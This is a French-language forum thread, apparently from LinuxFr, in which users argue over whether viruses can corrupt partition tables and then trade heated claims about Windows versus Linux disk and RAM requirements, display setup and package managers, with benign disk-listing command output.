      • [^] # Re: Pas sous linux, mais…

        Posté par (page perso) . Évalué à  3 . Dernière modification : le 27/02/13 à 20:27

        Rien à voir avec des secteurs morts. Dans les deux cas les disques durs étaient en parfait état. Simplement les données décrivant les positions et extension des partitions n'étaient pas cohérentes. Et c'est juste pas souci d'exhaustivité que j'envisage une forfaiture « à la Redmond ». Le sujet était les virus, et l'hypothèse associée était ma première idée.

        Mais puisque il ne faut surtout pas suggérer ou envisager quoi que ce soit de négatif à l'égard des nervis de Steevy B., je bat humblement ma coulpe ; encore ; et encore ! Et retire moralement l'hypothèse.
        Ça va mieux pour votre amour propre ? On peu revenir au sujet : les virus et leur effet sur l'écosystème GNU/Linux (en l'occurrence parted et fdisk). Un sujet directement en relation avec mon message et aucunement avec le votre. Vous ne verrez donc pas d'objection à un jugement de totale inutilité de votre intervention.

        • [^] # Re: Pas sous linux, mais…

          Posté par . Évalué à  -1 .

          Et c'est juste pas souci d'exhaustivité que j'envisage une forfaiture « à la Redmond »

          Et ca se permet de juger mon intervention…c'est vrai que quand linux n'arrive pas a faire un truc, faut toujours inclure Billou….(pourquoi pas les ptits hommes verts ?)

          Wep un virus ca peut modifier le boot sector…grande decouverte.

          • [^] # Re: Pas sous linux, mais…

            Posté par (page perso) . Évalué à  2 .

            Hors sujet quant au troll

            [Ironie] Mon délire paranoïaque est percé à jour. Quelle folie que d'inférer qu'il puisse y avoir une relation entre le système d'exploitation d'une machine et l'état de son disque dur. [/ironie]

            Plus sérieusement, veuillez m'excuser pour mon emportement. J'ai un peu de mal à encaisser les accusation de « troll » quant à l'expression de mon opinion fondée — nécessairement de mon point de vue — sur les illustres créateurs de Bureau, Mot, et Fenêtres. Pour ma défense, je dois dire que ce mois ci je me suis fait virer des commentaires de pcinpact pour avoir laisser entendre qu'une version sur deux de windos n'était pas une réussite hallucinante. Alors les accusations infondées, par des toxicos du propriétaires qui ne supportent simplement pas d'entendre évoquer un point de vue différent de celui apparent depuis la lucarne de leur prison… j'en ai ma claque.

            Merci d'admettre que le monde est vaste et qu'un fan de logiciels libres puisse porter, et surtout exprimer, un regard différent et peu compatible avec le votre ou complaisant sur le vaste monde et vos geôles en particulier. Et que ceci ne relève nullement du troll, ou de la provocation. Étant diamétralement opposées, nos visions sont nécessairement irréconciliables et il me paraît donc vain d'espérer me convaincre par ces imprécations vaines. Merci d'y mettre un terme.

            Virus et partitions

            Ce sujet étant clos, revenons à nos moutons. Il ne s'agit ici pas exactement de modifications du secteur de boot. Plutôt de changement supposés, et à tout le moins d'erreurs manifestes, dans le positionnement des partitions. Je n'ai malheureusement plus le détail exact. Une coupure de courant ayant vidé mon /tmp. Mais j'aurais aimé savoir si d'autres gens s'étaient trouvés confrontés à des situations similaires. Le fait d'avoir rencontré à deux reprises des cas similaires me semblant infirmer quelque peu l'hypothèse qu'il s'agisse d'événements fortuits.

            Comment aider

            Puisque vous disposez vraisemblablement de nombreuses machines corrompues par l'enfermement privateur, peut-être pourriez-vous contribuer utilement en nous rapportant les résultats de commandes telles que « sfdisk -d », « parted -l » et « fdisk -l » sur vos disques. Ces logiciels sont libres, vous n'avez donc pas à craindre d'infraction au droit en les employant. Avec un peu de chance, vous pourriez tomber sur des symptômes similaires à ceux que j'évoque, et contribuer ainsi à une caractérisation précise.

            • [^] # Re: Pas sous linux, mais…

              Posté par . Évalué à  2 .

              Puisque vous disposez vraisemblablement de nombreuses machines corrompues par l'enfermement privateur, peut-être pourriez-vous contribuer utilement en nous rapportant les résultats de commandes telles que « sfdisk -d », « parted -l » et « fdisk -l » sur vos disques. Ces logiciels sont libres, vous n'avez donc pas à craindre d'infraction au droit en les employant. Avec un peu de chance, vous pourriez tomber sur des symptômes similaires à ceux que j'évoque, et contribuer ainsi à une caractérisation précise.

              sudo sfdisk -d /dev/sdb
              # partition table of /dev/sdb
              unit: sectors
              
              /dev/sdb1 : start=     6144, size= 62521344, Id=83
              /dev/sdb2 : start= 62527488, size=   204800, Id= 7, bootable
              /dev/sdb3 : start= 62732288, size= 62308352, Id= 7
              /dev/sdb4 : start=        0, size=        0, Id= 0
              
              sudo parted -l /dev/sdb
              Modèle: ATA ST9320320AS (scsi)
              Disque /dev/sda : 320GB
              Taille des secteurs (logiques/physiques): 512B/512B
              Table de partitions : msdos
              Disk Flags: 
              
              Numéro  Début   Fin     Taille  Type     Système de fichiers  Fanions
               1      1049kB  44,0GB  44,0GB  primary  ntfs
               2      44,0GB  320GB   276GB   primary  ext4
              
              
              Modèle: ATA SAMSUNG SSD 830 (scsi)
              Disque /dev/sdb : 64,0GB
              Taille des secteurs (logiques/physiques): 512B/512B
              Table de partitions : msdos
              Disk Flags: 
              
              Numéro  Début   Fin     Taille  Type     Système de fichiers  Fanions
               1      3146kB  32,0GB  32,0GB  primary  ext4
               2      32,0GB  32,1GB  105MB   primary  ntfs                 démarrage
               3      32,1GB  64,0GB  31,9GB  primary  ntfs
              
              
              sudo fdisk -l
              
              Disque /dev/sdb : 64.0 Go, 64023257088 octets, 125045424 secteurs
              Unités = secteur de 1 × 512 = 512 octets
              Taille de secteur (logique / physique) : 512 octets / 512 octets
              taille d'E/S (minimale / optimale) : 512 octets / 512 octets
              Identifiant de disque : 0xe5b4e44f
              
              Périphérique Amorce  Début        Fin      Blocs     Id  Système
              /dev/sdb1            6144    62527487    31260672   83  Linux
              /dev/sdb2   *    62527488    62732287      102400    7  HPFS/NTFS/exFAT
              /dev/sdb3        62732288   125040639    31154176    7  HPFS/NTFS/exFAT
              
              Disque /dev/sda : 320.1 Go, 320072933376 octets, 625142448 secteurs
              Unités = secteur de 1 × 512 = 512 octets
              Taille de secteur (logique / physique) : 512 octets / 512 octets
              taille d'E/S (minimale / optimale) : 512 octets / 512 octets
              Identifiant de disque : 0xefc97729
              
              Périphérique Amorce  Début        Fin      Blocs     Id  Système
              /dev/sda1            2048    85968895    42983424    7  HPFS/NTFS/exFAT
              /dev/sda2        85968896   625125375   269578240   83  Linux
              
              

              De rien.

              "Quand certains râlent contre systemd, d'autres s'attaquent aux vrais problèmes." (merci Sinma !)

              • [^] # Re: Pas sous linux, mais…

                Posté par (page perso) . Évalué à  2 .

                Sans être un expert je ne vois rien de troublant dans ces données. À part peut-être cette dernière partition de taille nulle vue par sfdisk et pas par les autres. Mais apparemment, ce serait juste une tournure idiosyncratique pour signifier qu'il n'y a que trois partitions.

            • [^] # Re: Pas sous linux, mais…

              Posté par (page perso) . Évalué à  4 .

              Une coupure de courant ayant vidé mon /tmp. Mais j'aurais aimé savoir si d'autres gens s'étaient trouvés confrontés à des situations similaires.

              Nan, j'ai un onduleur.

            • [^] # Re: Pas sous linux, mais…

              Posté par . Évalué à  -2 .

              http://msdn.microsoft.com/en-us/library/windows/desktop/aa363785(v=vs.85).aspx

              Mais c'est tellement plus simple d'imaginer des histoires de complot a la noix hein…

              • [^] # Re: Pas sous linux, mais…

                Posté par (page perso) . Évalué à  1 .

                Très juste, c'est beaucoup plus facile. Et par atavisme j'aurais même tendance à éviter une page comportant certains mots-clefs même si un moteur de recherche me la proposait.
                Mais comme le lien vient de vous et que vous propos(i)ez régulièrement des contenus techniquement intéressant, pour vous répondre il m'a bien fallu cliquer.

                J'en retiens un exposé relativement intelligible — quoiqu'emprunt du jargon du côté obscur, qui aboutit aux effroyables circonvolution liminaires mais laisse rapidement place à quelque chose de plus digeste — sur la nature et la technique des partitionnements GPT et MBR. Donc pour moi un contenu intéressant étant donné que le GPT m'était inconnu il y a peu.
                Toutefois, je ne vois là rien ayant un rapport avec le sujet. Il eût sans doute fallu également le préciser (en sus des faits que les disques ne comportaient pas de défaut physiques, et qu'il ne s'agissait pas d'une corruption des données du MBR) : le partitionnement était dans les deux cas de type MBR.
                Il ne faudrait pas exclure que mon incapacité à trouver dans le document que vous citez une explication à mon problème soit lié à mon absence de compétences techniques — n'étant pas informaticien. Sauriez-vous développer votre propos ? En l'état je comprends que votre suggestion est précisément la première idée qui m'était venue à l'esprit dans l'un de mes cas : un partitionnement GPT qui aurait été mal géré par les outils Unix. Mais les symptômes auraient vraisemblablement été opposés : c'est fdisk (me semble-t-il) qui ne gère pas le GPT…

                • [^] # Re: Pas sous linux, mais…

                  Posté par . Évalué à  -1 .

                  Autre lien … http://www.kernel.org/doc/Documentation/ldm.txt

                  Notes que je ne peux evidemment pas etre sur que c'est la la difference, il y a certainement d'autres explications possible aussi. Mais cette crasse habitude d'aller a l'anti-Microsoft primaire donne une image assez pathetique de ton mode de pensee, et pour un prof ca fait peur.

                  • [^] # Re: Pas sous linux, mais…

                    Posté par (page perso) . Évalué à  1 .

                    Oups. Aurais-je dû préciser que le partitionnement était de type MBR classique, sans partitions dynamiques ? Ce n'était pas clair ?

                    Quant à votre jugement à mon égard, il me paraît des plus flatteurs. Merci. Puisses les autres enseignants mériter pareillement votre dédain. Cela permettrait à plus de jeunes de connaître d'autres horizons que celles du servage numérique auquel vous les soumettez.

  • # C'était hier...

    Posté par (page perso) . Évalué à  5 .

    Enfin, ni un virus, ni un ver, juste un PEBKAC qui a cliqué sur «oui» quand sa Ubuntu 10.04 lui a demandé si il acceptait la mise à jour vers 12.04 avec un / trop plein. Il m'a fallu deux heures pour remettre la machine d'aplomb ;(

    * Ils vendront Usenet quand on aura fini de le remplir.

    • [^] # Re: C'était hier...

      Posté par . Évalué à  0 .

      C'est pareil sous Fedora, pas foutu verifier l'espace disque avant de lancer ue mise a jour non plus. Ca lance l'install qui aura pas la place de se faire vu que le cleanup n'est lance qu'a la fin…
      Donc en faisant tout a la main paquet apres paquet c'est faisable, en laissant l'outil faire, il fout tout en vrac…
      Et ca fait pas d'hier que c'est comme ca…

      Sous Windows au moins c'est fait 'paquet' par paquet et si un paquet s'installe pas faute de place un revert est fait.

      • [^] # Re: C'était hier...

        Posté par (page perso) . Évalué à  1 .

        Un jour j'ai installé un Win NT, dont on m'avait vanté les mérites par rapport à Win Me. D'abord il me bouffait trop de ram, et avec 2 Go d'espace libre pour l'installation, ça ne lui suffisait pas (sans avoir de logiciels installés). A la fin, j'ai fini par trouver qu'il lui fallait 10Go pour avoir un peu la paix. Au final, j'ai remis Win Me.

        Bien plus tard, je suis passé à Linux, et là, ce fut le bonheur. Faible consommation de ram, faible consommation d'espace disque, parce que sur les 1Go consommés, on a aussi les logiciels installés.

        Sous Debian aussi c'est fait paquet par paquet, et on sait d'avance combien seront téléchargés par Internet, et combien de place ça occupera en plus à la fin.

        Fédora utilise les trucs RPM, normal que tu ne contrôles rien. Tu peux installer aptitude, tu verras c'est super.

        Bonne nuit
        G

        • [^] # Re: C'était hier...

          Posté par . Évalué à  -3 .

          Et les conneries continuent…

          Win XP tenait dans 1Go de disque, il n'a certainement jamais eu besoin de 10Go. Les versions precedents demandaient evidemment encore moins.

          Faudrait quand meme penser a revenir sur terre et t'informer avant de raconter n'importe quoi.

          • [^] # Re: C'était hier...

            Posté par (page perso) . Évalué à  0 .

            Je parlais de NT, mais si ça se trouve, c'était 2000.

            De toute façon, avec 2Go, même si le win était installé, j'avais tout le temps des alertes pour me dire qu'il manquait d'espace libre…

            • [^] # Re: C'était hier...

              Posté par . Évalué à  -2 .

              Encore mieux, ces 2 OS prennent moins de place que XP !

              Non vraiment, il faudrait penser a te demander si tu es bien place pour parler d'un systeme que clairement tu connais tres mal.

            • [^] # Re: C'était hier...

              Posté par . Évalué à  1 .

              Je parlais de NT, mais si ça se trouve, c'était 2000.

              Les deux tiennent largement sur < 2 Go.

              "Quand certains râlent contre systemd, d'autres s'attaquent aux vrais problèmes." (merci Sinma !)

              • [^] # Re: C'était hier...

                Posté par (page perso) . Évalué à  1 .

                Je n'ai pas dit qu'on pouvait pas l'installer sur 2Go, j'ai dit que j'avais toujours Win chose qui se plaignait de ne pas avoir assez d'espace libre.

                • [^] # Re: C'était hier...

                  Posté par . Évalué à  -2 .

                  Et les 2 fonctionnaient sans probleme dans <2Go avec softs inclus, on parle pas juste d'installation. T'as clairement pas cherche a comprendre pourquoi il se plaignait et quelle etait la cause.

                  • [^] # Re: C'était hier...

                    Posté par (page perso) . Évalué à  0 .

                    T'as raison, à l'installation il ne m'a rien dit.

                    Lors de l'utilisation, j'avais constamment ces alertes, et je sais lire. Quand j'eu fait l'installation sur 10Go, windows a fermé sa gueule.

                    A l'époque je n'utilisais que les navigateurs web, OpenOffice de temps en temps, jEdit, Ultraedit, et Easyphp. C'est pas ça qui bouffe de la place.

                    T'es vraiment de mauvaise fois quand tu t'y met.

                    • [^] # Re: C'était hier...

                      Posté par . Évalué à  -2 .

                      Non aucune mauvaise foi, simplement la realite : tu n'as aucune idee de ce qui aurait pu causer ce message et tu as mis ca sur le dos du systeme sans raison.

                      • [^] # Re: C'était hier...

                        Posté par (page perso) . Évalué à  0 .

                        Tu veux dire que ce n'était pas le système?
                        C'est quoi alors?
                        Aucun de ces logiciels (j'avais oublié The Gimp dans la liste) lance des alertes quand ils ne sont pas en cours d'exécution.

                        Le système Windows me demandait plus d'espace libre, il m'avertissait qu'il n'y en avait pas assez sur le disque C, et que cela pouvait poser un problème.

                        Un peu le même genre d'alerte que j'ai vu chez un client quand sous Vista il se connecte et lance un navigateur et obtien une alerte pour prévenir combien Internet c'est dangereux (ça remonte à moins loin, genre 2009). Ces alertes à la con, c'est qui alors?

                        • [^] # Re: C'était hier...

                          Posté par . Évalué à  1 .

                          Un truc désactivable en deux clics, qui te préviens que le taux d'occupation de l'espace disque dépasse un certain pourcentage.

                          Bref, le genre de truc qui peut aussi exister aussi sur d'autres OS (certains distribs doivent bien a voir un widget pour) qui n'attendent pas que l'OS arrive a 0kb d'espace disque pendant une mise a jour et qui du coup foutent tout le systeme en vrac…un truc intelligent quoi.

                          Accessoirement on t'as repondu, yum fait le meme boulot que apt, non les updates ne sont pas faites paquet par paquet par yum non plus…et c'est justement ca le probleme…Bref tu racontes n'importe quoi quel que soit l'OS dont tu parles.

                          Ca ne verifie que si tu as l'espace de telecharger, et l'espace en fin d'installation SI tout c'etait bien passe.

                          Si ca se passe mal (faute de place) t'as un systeme en carafe.
                          Pour un OS dont les defenseurs ne cesse de vanter sa resistance dans les mains d'une madame michu, alors qu'il est capable de se vautrer tout seul a chaque mise a jour, ca me fait bien marrer…

                        • [^] # Re: C'était hier...

                          Posté par . Évalué à  -2 .

                          L'OS t'alerte que le disque commence a etre plein, mais qu'est ce qui te dit que c'est l'OS qui consomme cet espace disque ? Rien, etre le messager ne veut pas dire etre le coupable.

                          • [^] # Re: C'était hier...

                            Posté par (page perso) . Évalué à  1 .

                            Avoir 500Mo de libre (il y en avait bien plus que ça), ça ne devrait pas provoquer d'alertes par défaut.

                            Sous Linux, il y a aussi des alertes si on à laisse l'utilitaire s'installer, mais dans la fenêtre d'alerte on a aussi les boutons pour désactiver la fonctionnalité, ou bien la configurer. Un truc ergonomique quoi.

                            • [^] # Re: C'était hier...

                              Posté par . Évalué à  -3 .

                              C'est amusant quand meme, tu parles de NT qui date de 1996, tu veux bien me montrer comment Linux a cette époque gerait le manqué d'espace disque et quelle ergonomie le systeme avait compare a NT ? Je t'invites notamment a comparer l'installation d'un Linux de l'epoque a celle de NT histoire de rire un bon coup, XF86Config et ses warnings sur le risqué de bruler ton moniteur sont de grands souvenirs de l'epoque.

                              • [^] # Re: C'était hier...

                                Posté par (page perso) . Évalué à  1 .

                                Ce n'est pas parce que je parle de NT (qui date de 1996) que c'était effectivement à cet époque que je m'en suis servi. Win NT n'a pas évolué, alors que les Linux, quand on les installait, ils était à jour… pas de cette vieille époque quoi.

                                Quand aux écrans, sous Windows, c'était en 800x600 par défaut, et à 60Hz, de quoi te bousiller les yeux. Sous Linux, les cartes vidéo pas trop exotiques étaient bien reconnues, et j'ai toujours eu mieux (en dual screen) que ce que je pouvais avoir sous Windows en étant sous Linux. Je n'ai jamais eu à écrire les lignes de paramètres de synchro dans XF86Config comme tu le prétends. C'est une possibilité qui existe pour la liberté de l'utilisateur, mais on en a généralement pas besoin. Pourquoi tu cherches toujours le côté compliqué de Linux, c'est faux.

                                Enfin, Windows n'est pas à l'abri des brûlages de moniteurs, ça existait avant Windows, et cela fait longtemps que les écrans sont équipés de mécanismes pour éviter ça. Donc, rien à voir avec l'OS.

                                • [^] # Re: C'était hier...

                                  Posté par . Évalué à  -1 .

                                  Si tu n'installes pas le dernier systeme, de quoi tu te plains ? C'est toi qui decide du systeme, assumes.

                                  Enfin, si tu ne sais pas changer la resolution de l'ecran je ne peux rien pour toi. Les cartes graphiques a l'epoque, sans question, etaient bien mieux reconnues sous Windows que sous Linux, et sans avoir de bidouilles a faire.

                                  XF86Config te demandait pas d'ecrire les lignes, il te demandait le type de ton moniteur, t'avertissait du risque de cramer l'ecran si tu te trompes, et ensuite faisait une sorte de detection. On va dire que niveau 'user friendly' on a connu mieux hein.

                                  La realite est que sous Windows rien de cela n'etait necessaire, t'inserait le disque du fabriquant de carte, tu cliquais, ca marche. J'ai passé je ne sais combien de temps avec mon Linux de l'epoque en ligne de commande uniquement car ma Diamond 64 (chipset 968, je m'en souviens encore) n'etait a l'epoque pas reconnue par XF86Config. Le positif est que j'ai sacrement bien appris ce qu'on pouvait faire en ligne de commande a l'epoque :/

                                • [^] # Re: C'était hier...

                                  Posté par . Évalué à  2 . Dernière modification : le 05/03/13 à 10:38

                                  Quand aux écrans, sous Windows, c'était en 800x600 par défaut, et à 60Hz

                                  Wep sous Windows, ca affichait toujours quelque chose (le mode compatible VGA), et ensuite les drivers te permettait de changer vers mieux…en quelques clics et sans besoin de savoir configurer quoi que ce soit dans une fichier de config obscur.

                                  Sous Linux a l'epoque ca affichait le plus souvent…rien…

                                  Accesoirement Linux (Que ca soit Ubuntu ou Fedora) est toujours pas foutu gerer mon ecran IIyama cathoqiue…en 2013. (il monte jusque qu'en 2048, mais j'ai seulement une resolution batarde 1800 qqcchose en 4/3, meme pas foutu gerer les resolution classiques 1920)

                                  Win98 sur une pauvre carte graphique en etait pourtant capable.

                                  Continue de nous amuser t'es champion!

                                  • [^] # Re: C'était hier...

                                    Posté par (page perso) . Évalué à  0 .

                                    La semaine dernière j'ai essayé des écrans, avec mon eeePC 701.

                                    Sur certains, impossible de choisir une résolution supérieur à 1024x768 via le menu;
                                    Sur d'autres, pas de soucis, je peux choisir 1920x….

                                    Ce qui m'a surpris, c'est que sur deux modèles similaires, disons le X2360 et le X2340 j'étais dans ce cas de figure… comme quoi, une petite différence dans la référence et l'écran n'est pas reconnu. (les noms sont fictifs, je n'ai pas mon carnet sous la main).

                                    Donc ce n'est pas un problème de carte vidéo, mais plutôt d'écran qui doit pas respecter un protocole de communication.

                                    Désolé PbPg si t'es resté coincé à l'époque du Linux qui faisait péniblement la découverte de l'écran pour générer le fichier de configuration.

                                    Sous Linux, il y a aussi le mode VESA, fallait essayer, mais parfois ça fonctionne pas du tout, ce qui nécessite de choisir proprement son matériel, comme d'habitude.

                                    Cela me fait penser aux scanners et imprimantes qu'on peut trouver dans la rue, qui ne sont plus reconnus sous Windows parce que le fabricant à décidé de ne plus faire de drivers… heureusement généralement ça fonctionne très bien sous Linux…

                                    • [^] # Re: C'était hier...

                                      Posté par . Évalué à  2 . Dernière modification : le 05/03/13 à 19:24

                                      Donc ce n'est pas un problème de carte vidéo, mais plutôt d'écran qui doit pas respecter un protocole de communication.

                                      C'est marrant Windows s'en sort lui…
                                      "Linux", pas foutu gerer les ecrans…2013…
                                      Wep c'est un OS de bureau de champion.

                                      Et non je vais pas tester 15 distribs differentes pour trouver celle qu iy arrive et qui merdera a gerer autre chose, parce que la aussi j'arrive pas a comprendre comment alors que les drivers sont dans le kernel, les distros soient pas foutus gerer le meme matos de la meme maniere.

                                      Accessoirement mon scanner acheter a l'epoque de Win98 fonctionne sous Seven.
                                      Et c'est devenu un non probleme avec les machines virtuelles.

                                      • [^] # Re: C'était hier...

                                        Posté par (page perso) . Évalué à  1 .

                                        Je n'ai pas dit que windows s'en sortait mieux.

                                        S'il faut un driver exotique, cela signifie qu'au bout de quelques anné&es le matériel devient inutilisable… le cas pour des webcams, certains écrans…

                                        Non tu vas pas tester toutes les distribs, surtout que dans ton cas de figure ça ne dépends pas tellement de la distrib.

                                        Ce n'est pas parce que ça ne fonctionne pas exceptionnellement sous Linux qu'il faut le rejeter en bloc.

                                        Oui, les très vieux scanners fonctionnent très bien. Les seuls qui semblent poser un problème sont ceux sans firmware, qui est envoyé au scanner par le système. Ce matériel-là à toujours un risque de ne plus fonctionner lors d'une mise à jour de windows. C'est le cas pour les scanners et imprimantes de ce type. Sous Linux, quand ça fonctionne une fois, ça fonctionne toujours.

                                        • [^] # Re: C'était hier...

                                          Posté par . Évalué à  1 .

                                          Sous Linux, quand ça fonctionne une fois, ça fonctionne toujours.

                                          HAHA !!

                                          Fut un temps où l'hibernation et la mise en veille fonctionnait sur ma machine. Sauf que ça date de 2010 et que ce n'est plus vrai aujourd'hui. C'est pas faute d'essayer (modification de la DSDT, etc…). Rien à faire !

                                          Fut un temps où des distributions GNU/Linux fonctionnait sur Amiga ou PowerPC, c'est plus vraiment le cas aujourd'hui.

                                          etc…

                                          "Quand certains râlent contre systemd, d'autres s'attaquent aux vrais problèmes." (merci Sinma !)

                                        • [^] # Re: C'était hier...

                                          Posté par . Évalué à  2 .

                                          S'il faut un driver exotique, cela signifie qu'au bout de quelques anné&es le matériel devient inutilisable… le cas pour des webcams, certains écrans…

                                          Non il n'y a jamais eu un seul écran devenant inutilisable….y a jamais eu besoin de drivers pour un écran…

                                          Les webcams oui, (mais c'est le cas sous Linux aussi, jen ai un bien pourrie de marque LDLC qui veut plus fonctionner sur nimporte quel OS recent)

                                          Mais de toute façon ce n'est plus un problème, pour tout ce qui est peripherique il suffit de virtualiser l'OS qui va bien…au prix de la RAM et de la taille des disques durs, franchement c'est fait pour.

          • [^] # Re: C'était hier...

            Posté par . Évalué à  1 .

            Là, je crois que c'est toi qui raconte n'importe quoi.

            Je serai très surpris de voir un XP ne nécessiter que 1Go et fonctionner correctement. Ou alors, peut-être un XP modifié dont j'ai entendu parler, mais que je n'ai jamais vu…

            Sur la machine que j'ai ici, installation veillote (et franchement, je triplerai mes perf en faisant une réinstallation propre…), je peux dire que le c:\windows prends 5.6Go, et le system32 ~900Mo, en ayant enlevé dllcache.

            Sinon, au niveau d'une installation fraîche:
            Windows XP nécessite au minimum 256Mo de ram. Il crée par défaut un swapfile de 1.5*ram => 384Mo.
            Ajoutes les outils pour utiliser un système normalement: un browser récent, un lecteur pdf, une suite de bureautique, ne serait-ce que word (ou abiword pour un truc léger) et le système, et fais rentrer ça sur 1 seul et unique Go, pour voir?
            Sinon, j'irai voir sur mon dual boot de jeu combien prends ce cher XP, l'install est moins crade que celle de mon taf, mais, de mémoire, sa partition est de 30Go: 10Go pour le système et les utilitaires, le reste pour les 2-3 jeux que j'utilise (j'ai les installateurs sur une partition linux, donc quand je change de jeux, je nettoie et j'installe. Mais bon, vais p'tet passer cette partition à 50 un jour…).

            On est loin du Giga pour les contenir tous, très loin… ça, c'était plus windows 98 se.

            • [^] # Re: C'était hier...

              Posté par (page perso) . Évalué à  1 .

              Windows XP nécessite au minimum 256Mo de ram

              Euh, je faisais tourner Windows XP avec 32 Mo de RAM… J’ai utilisé ça pendant près d’un an, ce n’était peut-être pas super confortable mais ça marchait bien.

              Pour ce qui est de l’espace disque, le même Windows XP fraîchement installé prenait précisément 2,3 Go — je m’en souviens très bien, vu qu’avec un disque de 6 Go, à l’époque j’étais très regardant sur l’espace disque occupé par n’importe quel logiciel, y compris l’OS).

            • [^] # Re: C'était hier...

              Posté par . Évalué à  -2 .

              Non non, XP ca entre dans 1Go (je le sais je l'ai fait) quand tu enleves le fichier d'hibernation et dllcache notamment, le swap file avait peut-etre besoin d'une modif, je ne m'en souviens plus.

              Un systeme avec toutes les apps recents non, mais l'ami il parlait a l'epoque de WinME hein, c'etait 2001-2002 ca et il parlait sans les apps…

              • [^] # Re: C'était hier...

                Posté par (page perso) . Évalué à  0 .

                Et à la même époque, Linux + grosses application tenait dans 1Go, sans devoir faire des bidouilles.

                En tout cas, à l'époque, j'avais déjà l'habitude de prévoir une autre partition pour les applications, et une troisième pour mes données, parce qu'un win, faut toujours le réinstaller régulièrement pour que ça aille mieux (obsolescence programmée).

                • [^] # Re: C'était hier...

                  Posté par . Évalué à  1 .

                  parce qu'un win, faut toujours le réinstaller régulièrement pour que ça aille mieux (obsolescence programmée).

                  N'importe quoi. Mes Windows ont plusieurs années d'existence depuis la date d'installation. La maintenance est plus laborieuse que celle d'un GNU/Linux (SURTOUT pour les mises à jours), c'est tout.

                  Ceux qui réinstallent régulièrement, c'est parcequ'ils foutent la merde régulièrement.

                  "Quand certains râlent contre systemd, d'autres s'attaquent aux vrais problèmes." (merci Sinma !)

                  • [^] # Re: C'était hier...

                    Posté par . Évalué à  4 .

                    Je confirme qu'un windows bien géré, sans accès au net peut durer des années, j'ai eu un win98SE qui m'a tenu plus de 5 ans avec une maintenance minimum. Mon Xp n'a pas eu de gros problèmes (sauf quand je suis passé d'IDE à sata, là ça a été fatal)

                    Mais j'ai été appelé pour réparer des windows cassés et passé deux trois truc comme le mode sans échecs et celui où il demande avant chaque commande au démarrage (ce qui permet de trouver laquelle plante), je suis incapable de faire quoi que ce soit.

                    Par contre récemment j'ai tenté une upgrade de mageia2 => mageia3 beta?, avec la procédure assez lourde pour la fusion /bin et /usr/bin, hé ben au final j'ai planté grub (reboot en boucle). Mais j'ai pu résoudre les soucis à coup de liveCD (sur usb) (mageia cauldron kde)=> configuration lilo.conf à la main (grub et grub2 se plantaient lorsqu'ils tentaient d'écrire) et lilo -r /mnt. Je dois bien dire que j'aurais découvert linux à l'époque grub (et pas connu lilo donc). Je n'aurais eu d'autre choix que de réinstaller le bouzin ;)

                    Enfin tout ça pour dire que quand on connait le système, on peut le dépanner. J'ai une meilleur connaissance de GNU/Linux, qui me permet de réparer une distrib là où je réinstallerai un windows.

                    Il ne faut pas décorner les boeufs avant d'avoir semé le vent

                • [^] # Re: C'était hier...

                  Posté par . Évalué à  -3 .

                  Oh c'est sur. Bon le truc c'est qu'a l'epoque un Linux compare a XP c'etait une enorme rigolade en terme d'utilisation et StarOffice une enorme vache, mais c'est pas grave.

                  Sinon, tu comptes bientot arreter de sortir connerie sur connerie sur un OS dont tu ne connais rien ? Ca commence a devenir lassant.

            • [^] # Re: C'était hier...

              Posté par . Évalué à  2 .

              Je serai très surpris de voir un XP ne nécessiter que 1Go et fonctionner correctement.

              A son depart c'etait possible, avec le SP3 beaucoup moins, meme en faisant l'installation d'office.
              En meme temps, depuis sa sortie l'espace disque n'est plus un probleme.
              Mais jusqu'il y a un an ou deux, je le faisait tourner parfaitement sur un Iram de 3,5 gig, avec tous les logiciels dont j'avais besoin. (en 32 bits).
              Accessoirement pour le swap Linux s'octroit lui aussi une partition swap…donc ce fichier n'est pas a compter dans l'utilisation (pareil ca fait bien longtemps que j'ai desactive le swap sous Windows)
              Le fichier d'hibernation tu peux t'en passer si c'est pas un portable. (et sous Linux l'hibernation n'a jamais fonctionne sous aucune de mes machines je pense…….)

              Bref Les deux OS a fonctionalites peu ou proux egales ne sont gueres differents en taille d'installation.

        • [^] # Re: C'était hier...

          Posté par . Évalué à  3 . Dernière modification : le 01/03/13 à 09:30

          Un jour j'ai installé un Win NT, dont on m'avait vanté les mérites par rapport à Win Me. D'abord il me bouffait trop de ram, et avec 2 Go d'espace libre pour l'installation, ça ne lui suffisait pas (sans avoir de logiciels installés).

          Windows NT 4 Workstation, sorti en 1994 à destination des entreprises, exigeait 64 Mo de RAM. Windows 95 peut tourner (mais juste l'OS seul, vive le swap !) avec 8 Mo de RAM. Mais Windows 95 n'offre pas de protection mémoire entre tous les programmes (juste pour les programmes 32 bits) ni de pré-emptivité du kernel sur tous les programmes (encore une fois, juste pour les programmes 32 bits), et donc plante largement beaucoup plus. Win 98 ou ME ne fait pas exception (SURTOUT Windows ME…).

          Windows XP (j'imagine que c'est pareil pour 2000, ou sinon ce serait un peu plus léger) exige 128 Mo de RAM, et 1 Go pour s'installer (1,5 Go pour XP SP3). Et il a des logiciels installés avec (IE, Wordpad, paint, notepad, Windows Media Player, …)

          Tu rajoutes ce qu'il faut (LibreOffice, sumatraPDF, …), tu arrives à 3 ou 5 Go maximum…

          "Quand certains râlent contre systemd, d'autres s'attaquent aux vrais problèmes." (merci Sinma !)

          • [^] # Re: C'était hier...

            Posté par . Évalué à  1 .

            Juste pour m'amuser, j'avais fait tourner un XP avec 64 Mo de Ram sur un vieux portable Compaq, il était fonctionnel. Win 2000 était encore moins gourmand et fonctionnait parfaitement avec 128 Mo de RAM.

            On peut toujours faire fonctionner un XP avec très très peu de RAM, mais il faut un peu bidouiller, comme pour Linux en somme.

        • [^] # Re: C'était hier...

          Posté par (page perso) . Évalué à  2 . Dernière modification : le 01/03/13 à 13:01

          Sous Debian aussi c'est fait paquet par paquet, et on sait d'avance combien seront téléchargés par Internet, et combien de place ça occupera en plus à la fin.

          Fédora utilise les trucs RPM, normal que tu ne contrôles rien. Tu peux installer aptitude, tu verras c'est super.


          [root@Yggdrasil ~]# yum upgrade
          […]
          Package Architecture Version Dépôt Taille
          Installation de :
          kernel x86_64 3.7.9-205.fc18 updates 27 M
          Mise à jour :
          acpid x86_64 2.0.18-2.fc18 updates 66 k
          […]
          Résumé de la transaction
          Installation 1 Paquet (+1 Paquet en dépendance)
          Mettre à jour 63 Paquets

          Taille totale  : 88 M
          Taille totale des téléchargements : 47 M


          D'autres conneri désinformations à nous faire partager ?

  • # Le plus gros virus de tout les temps, multi-os, sans fils (ou presque).

    Posté par . Évalué à  4 .

    On le trouve pratiquement toujours entre la chaise et le clavier.
    En plus, il est pratiquement impossible à éliminer (c'est interdit par la loi).
